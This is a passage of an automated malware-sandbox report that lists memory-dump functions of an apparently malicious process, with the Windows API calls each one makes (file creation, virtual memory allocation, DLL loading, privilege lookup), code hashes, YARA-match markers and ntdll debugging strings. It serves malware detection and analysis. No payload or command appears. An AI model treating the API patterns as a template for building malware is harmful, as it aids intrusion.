BMA, xrefs: 0041A002, 0041A010

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 370e936de0c6b30a0e9c68c176e8d16dab5dfb862c4be705976860dd555c5517
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: DCF0A4B2210208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: da85868aee8bb9042b2bf2c49af3bf0221720aabf0af91d379586db70367eeda
Instruction ID: 78f8c06168d7e5c563645fca604818fa245ceb741fbf86a4d6507e5e99517d3e
Opcode Fuzzy Hash: da85868aee8bb9042b2bf2c49af3bf0221720aabf0af91d379586db70367eeda
Instruction Fuzzy Hash: 980112B5D4020DB7DB10EBE5DC82FDEB7799B54308F0041AAE908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,00414B87,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B87,?,00409CC3,00000060,00000000,00000000), ref: 00419F7D

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 961861021b5599f6e321fa2eb4d652485a26ebd9b99d875dc12ce75f1520402c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 3DF0BDB2215208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A10A, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A149

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 5c0dbc549cd0b6ea2739c149edc035fde042ddd2a74801e6b5a669a0bb5e05ce
Instruction ID: 5cbbc96e9df8abea30e59bcfc560aca41ad5526be81a4b764fcc0fa9604412de
Opcode Fuzzy Hash: 5c0dbc549cd0b6ea2739c149edc035fde042ddd2a74801e6b5a669a0bb5e05ce
Instruction Fuzzy Hash: F8F01CB2210218ABCB14DF89CC91EE777ADAF88354F118649FE18A7251C634F951CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A110, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A149

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 37a8c631670896842b218247a062c4f669cdd6b33082669530ec9f00ac69b820
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 2BF015B2210208ABCB14DF89CC81EEB77ADAF88754F118249BE0897241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CC3,FFFFFFFF), ref: 0041A085

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 6cd8388973e83edfd6cfca07806e1d74deb588f8289630df2fc4ecf908b9aac5
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 48D01776200214ABD710EB99CC85FE77BADEF48760F154599BA189B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01709910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0170991A

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ae650685646d84d7b87c9311e5027e8acf64f6a94d1a260f8533c092d3fe946
Instruction ID: 812b2603bd7b9528cc2ad5250c9ad8919a2a1924f07b38b9874abb9037385473
Opcode Fuzzy Hash: 8ae650685646d84d7b87c9311e5027e8acf64f6a94d1a260f8533c092d3fe946
Instruction Fuzzy Hash: DF9002B120501406D250759D84087464405A7D4341F51C421A5055554EC6998DD57AA5

Uniqueness

Uniqueness Score: -1.00%

Function 017099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017099AA

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7c5e185850b6a5f971e4fbbfb1f1ea8307256116c3b2b2c8d299fb4ca398c065
Instruction ID: 5c7b2e14534c40881d5d65a5fdd4cc1646407302c96b3e56cdfe43a0933610c0
Opcode Fuzzy Hash: 7c5e185850b6a5f971e4fbbfb1f1ea8307256116c3b2b2c8d299fb4ca398c065
Instruction Fuzzy Hash: 6D9002A134501446D210659D8418B064405E7E5341F51C425E1055554DC659CC527566

Uniqueness

Uniqueness Score: -1.00%

Function 01709860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0170986A

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bd5d4a16246709a400723dbc2c203b7e7c8bc246458d99efaaf52be36e587e5f
Instruction ID: 12bc442b64b8e36600c8fb3f09bb7fe998ebe36a5d40eda498fb1731a0735ba3
Opcode Fuzzy Hash: bd5d4a16246709a400723dbc2c203b7e7c8bc246458d99efaaf52be36e587e5f
Instruction Fuzzy Hash: 2890027120501417D221659D85087074409A7D4281F91C822A0415558DD6968952B561

Uniqueness

Uniqueness Score: -1.00%

Function 01709840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0170984A

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b81a2a3e5bfa7ca6a1d25ffcadcde9eedb7932eb92a465c3a19d6cd90f27962c
Instruction ID: fb3765e29fe637aab55567c6799dffb714b5bc8d2809157a21d69039e26f7b0d
Opcode Fuzzy Hash: b81a2a3e5bfa7ca6a1d25ffcadcde9eedb7932eb92a465c3a19d6cd90f27962c
Instruction Fuzzy Hash: E7900261246051565655B59D84085078406B7E4281791C422A1405950CC5669856FA61

Uniqueness

Uniqueness Score: -1.00%

Function 017098F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017098FA

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 196a2795039f214abb4775ef2d6747bc87c08ba3df1e4570b89e3a5e9f270df7
Instruction ID: d9adf761061145a876ba4acf0ffa7daeef5b1b586347ca7e4e96218b37d066d8
Opcode Fuzzy Hash: 196a2795039f214abb4775ef2d6747bc87c08ba3df1e4570b89e3a5e9f270df7
Instruction Fuzzy Hash: 8B90026160501506D211759D8408616440AA7D4281F91C432A1015555ECA658992B571

Uniqueness

Uniqueness Score: -1.00%

Function 01709A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01709A5A

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a826f964ed52c4c9c205a3b285ea527ed8c44a57e11ed7f70263efd56cc565a6
Instruction ID: 29dced770d0f3aae87a1633ae304c17b3132bef20e5a23b738bbe864f81f038d
Opcode Fuzzy Hash: a826f964ed52c4c9c205a3b285ea527ed8c44a57e11ed7f70263efd56cc565a6
Instruction Fuzzy Hash: 2D90026121581046D31069AD8C18B074405A7D4343F51C525A0145554CC95588617961

Uniqueness

Uniqueness Score: -1.00%

Function 01709A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01709A2A

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ea42e6510bbc2643e94571caa82c62520071c64d1a5677dc9e4e63c41aaa01ec
Instruction ID: ea3f7dab983b97fd2d735a819c5a93acfd1cf30796ad9fbaef7c549344bb7893
Opcode Fuzzy Hash: ea42e6510bbc2643e94571caa82c62520071c64d1a5677dc9e4e63c41aaa01ec
Instruction Fuzzy Hash: 7890026160501046425075ADC8489068405BBE5251751C531A0989550DC59988657AA5

Uniqueness

Uniqueness Score: -1.00%

Function 01709A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01709A0A

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f67866fb624121fb179dfebf5b8a97c4c91c09cd5aa40cc91232e959880aca2a
Instruction ID: cf616f6b1c4714ad91c7a02848599d57db37ab126346198a8f760560602701d2
Opcode Fuzzy Hash: f67866fb624121fb179dfebf5b8a97c4c91c09cd5aa40cc91232e959880aca2a
Instruction Fuzzy Hash: 3990027120541406D210659D881870B4405A7D4342F51C421A1155555DC665885179B1

Uniqueness

Uniqueness Score: -1.00%

Function 01709540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0170954A

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bd32625caa516a4169c1df297383e5572cbf3a198630f41d66105eaea3827bb3
Instruction ID: 17af519bbff553db19182c8f8c454fb9d02a9394462e869bac7ddc75473572b7
Opcode Fuzzy Hash: bd32625caa516a4169c1df297383e5572cbf3a198630f41d66105eaea3827bb3
Instruction Fuzzy Hash: D2900265215010070215A99D47085074446A7D9391351C431F1006550CD66188617561

Uniqueness

Uniqueness Score: -1.00%

Function 017095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017095DA

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45a62a6a1d72211040beb4c81f2a60cdd0aa284faed27142ca1fa1c57f6bbe76
Instruction ID: 41fbe394487dc2f42a6f0afba882d16af304fb9945cf843c69131c73f8b7da77
Opcode Fuzzy Hash: 45a62a6a1d72211040beb4c81f2a60cdd0aa284faed27142ca1fa1c57f6bbe76
Instruction Fuzzy Hash: E19002A1206010074215759D8418616840AA7E4241B51C431E1005590DC56588917565

Uniqueness

Uniqueness Score: -1.00%

Function 01709710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0170971A

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9c552fc1708fffa6a49e76a88a6696dc098226894af6079e7e85e565fb2e422
Instruction ID: ec41963aea9e9c3f807612c18bce4a4542df46d8acd31006268c28c40c182690
Opcode Fuzzy Hash: e9c552fc1708fffa6a49e76a88a6696dc098226894af6079e7e85e565fb2e422
Instruction Fuzzy Hash: C290027120501406D21069DD940C6464405A7E4341F51D421A5015555EC6A588917571

Uniqueness

Uniqueness Score: -1.00%

Function 017097A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017097AA

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2dc0514498f2442631188f2efb608a524b43e9346bccb526e00f919fda452dc6
Instruction ID: 69eb51dfc12d2132b676b518ce3f6ffaef0394652dcf5b5b4047f002f3f2a191
Opcode Fuzzy Hash: 2dc0514498f2442631188f2efb608a524b43e9346bccb526e00f919fda452dc6
Instruction Fuzzy Hash: 0B90026130501007D250759D941C6068405F7E5341F51D421E0405554CD95588567662

Uniqueness

Uniqueness Score: -1.00%

Function 01709780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0170978A

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c89835cdf612a2a4aff4cf0de127393210cfec67bbd1b753e94c75d910cc616
Instruction ID: ca82ec75ecb1a83ae7ef084df2dd94208cd05d06dd53fe67657c988fe8fc2eaf
Opcode Fuzzy Hash: 3c89835cdf612a2a4aff4cf0de127393210cfec67bbd1b753e94c75d910cc616
Instruction Fuzzy Hash: 1290026921701006D290759D940C60A4405A7D5242F91D825A0006558CC95588697761

Uniqueness

Uniqueness Score: -1.00%

Function 01709660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0170966A

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e2c29888fec3ed05f91e27cccdd312fc07ee3c2599f3567e2c555f83c5a1cbe
Instruction ID: 1b72de863ee6aa3386bc4c9f2ee3228acab14a3ae3c1f90fc266007a96e034a2
Opcode Fuzzy Hash: 2e2c29888fec3ed05f91e27cccdd312fc07ee3c2599f3567e2c555f83c5a1cbe
Instruction Fuzzy Hash: BA90027120501806D290759D840864A4405A7D5341F91C425A0016654DCA558A597BE1

Uniqueness

Uniqueness Score: -1.00%

Function 017096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017096EA

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fab4bd36d50c6613383d72c0914c764f68d960c13bce7ecc9cc8559503daf25a
Instruction ID: 61397b74806864cdcf7e3614d8a8efdc93bc855562740ac1d9d1b525e5f557f6
Opcode Fuzzy Hash: fab4bd36d50c6613383d72c0914c764f68d960c13bce7ecc9cc8559503daf25a
Instruction Fuzzy Hash: CF90027120509806D220659DC40874A4405A7D4341F55C821A4415658DC6D588917561

Uniqueness

Uniqueness Score: -1.00%

Function 00409A80, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e514bf04e9fa459d1924c465e5779a8ae9875afbeb0140303072e2954826388
Instruction ID: 5500c7e9ff7cc53b01c2d5cadf26929dd8afd104e3fdb9986b919d631e035d5a
Opcode Fuzzy Hash: 0e514bf04e9fa459d1924c465e5779a8ae9875afbeb0140303072e2954826388
Instruction Fuzzy Hash: A8213CB2D4020857CB15D664AD42BEF737CAB54304F04007FE949A3182F63CBE498BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 0aa0a9a37f3ce1cfbf81c4bcd3ad6c7f0929db325d63879b8948915051c51c10
Instruction ID: 23845d3aa92de7f892dfa614e7636466e11139fbd0db560c7a8593405fd2fe3a
Opcode Fuzzy Hash: 0aa0a9a37f3ce1cfbf81c4bcd3ad6c7f0929db325d63879b8948915051c51c10
Instruction Fuzzy Hash: B601D431A803287BE720A6A59C03FFE772C6B40B54F04401AFF04BA1C1EAA8690542EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2AD, Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A26D

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 16e428302dd8c7502aaaab930b58f26f5123e3e98ac9e56bf98be2553b5d7d21
Instruction ID: 270b524385e77b77fb1fcad577b7c85749bf4c20e0788c8f27aa5031be7c21aa
Opcode Fuzzy Hash: 16e428302dd8c7502aaaab930b58f26f5123e3e98ac9e56bf98be2553b5d7d21
Instruction Fuzzy Hash: 0701D0B2214108BFCB14DF89DC81EEB73ADAF8C754F158259FA0D97241C630EC518BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A392, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D35), ref: 0041A3D0

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 7afd34512e80c42748f21159dbfe692e99b0ea3c6d575492111278ec48493e61
Instruction ID: 2dab643227a9e73b00eec3ee06c736d4a178b6aaf3878dbd5e8e6dac4982085b
Opcode Fuzzy Hash: 7afd34512e80c42748f21159dbfe692e99b0ea3c6d575492111278ec48493e61
Instruction Fuzzy Hash: 1AE092B5A002046FCB24DF55CD85EDB73A9EF88350F118569FD0C5B251D631E8158BF1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A240, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A26D

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 8b4701b4f03220052e2b3b5ed4c672ef58e2eb60ff823c8fb6afa074398e137c
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: DCE04FB12102046BD714DF59CC45EE777ADEF88750F014559FE0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A200, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A22D

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 4224f920e4464a65d08b1d76aaa125f94db740d8927d38e6c7d6b62f4195d12c
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 58E012B1210208ABDB14EF99CC41EA777ADAF88664F118559BA085B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D35), ref: 0041A3D0

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 9e479b2eaf60326b59b5a15a73b63e8f9b290ab663b6f1255dfa49a1ae2fc0e3
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: DFE01AB12002086BDB10DF49CC85EE737ADAF88650F018155BA0857241C934F8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A280, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: ec4c192c261470033b7d3fff11050ba2ce0bed15fbfecc5592b4580303735d53
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 29D017726142187BD620EB99CC85FD777ACDF487A0F0181A9BA1C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A272, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 4ae42815eb04a6b9a94b04e11cbe1ce10f531929400854dc6f659b499ccffbae
Instruction ID: 5afa4bffd169478b84741fa3636b6a89670d391976c3e1384544d0df4b877c56
Opcode Fuzzy Hash: 4ae42815eb04a6b9a94b04e11cbe1ce10f531929400854dc6f659b499ccffbae
Instruction Fuzzy Hash: 7BD0957050111077D7245F31CC8DFC3375CDF40310F508645B50C57202C738B210C691

Uniqueness

Uniqueness Score: -1.00%

Function 0170967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01709694

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7d1d0db54cc7282273b0e599de1bbc47db88b21f12fd97b2e6fe1dbeb44d5808
Instruction ID: 2083cbae7608e99fde7adbe7a2f202d28c5028827dbe7ac809ecd770d8bde02d
Opcode Fuzzy Hash: 7d1d0db54cc7282273b0e599de1bbc47db88b21f12fd97b2e6fe1dbeb44d5808
Instruction Fuzzy Hash: E7B09B719055D5C9D712D7A44A0C717FD4077D4745F16C561D2060645F8778C091F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0177B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0177B3D6
an invalid address, %p, xrefs: 0177B4CF
a NULL pointer, xrefs: 0177B4E0
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0177B314
The resource is owned shared by %d threads, xrefs: 0177B37E
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0177B53F
The instruction at %p referenced memory at %p., xrefs: 0177B432
The critical section is owned by thread %p., xrefs: 0177B3B9
The instruction at %p tried to %s , xrefs: 0177B4B6
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0177B323
<unknown>, xrefs: 0177B27E, 0177B2D1, 0177B350, 0177B399, 0177B417, 0177B48E
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0177B2DC
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0177B2F3
read from, xrefs: 0177B4AD, 0177B4B2
The resource is owned exclusively by thread %p, xrefs: 0177B374
*** Resource timeout (%p) in %ws:%s, xrefs: 0177B352
*** then kb to get the faulting stack, xrefs: 0177B51C
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0177B484
*** enter .cxr %p for the context, xrefs: 0177B50D
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0177B39B
*** Inpage error in %ws:%s, xrefs: 0177B418
This failed because of error %Ix., xrefs: 0177B446
*** An Access Violation occurred in %ws:%s, xrefs: 0177B48F
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0177B305
Go determine why that thread has not released the critical section., xrefs: 0177B3C5
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0177B47D
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0177B476
write to, xrefs: 0177B4A6
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0177B38F
*** enter .exr %p for the exception record, xrefs: 0177B4F1

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an 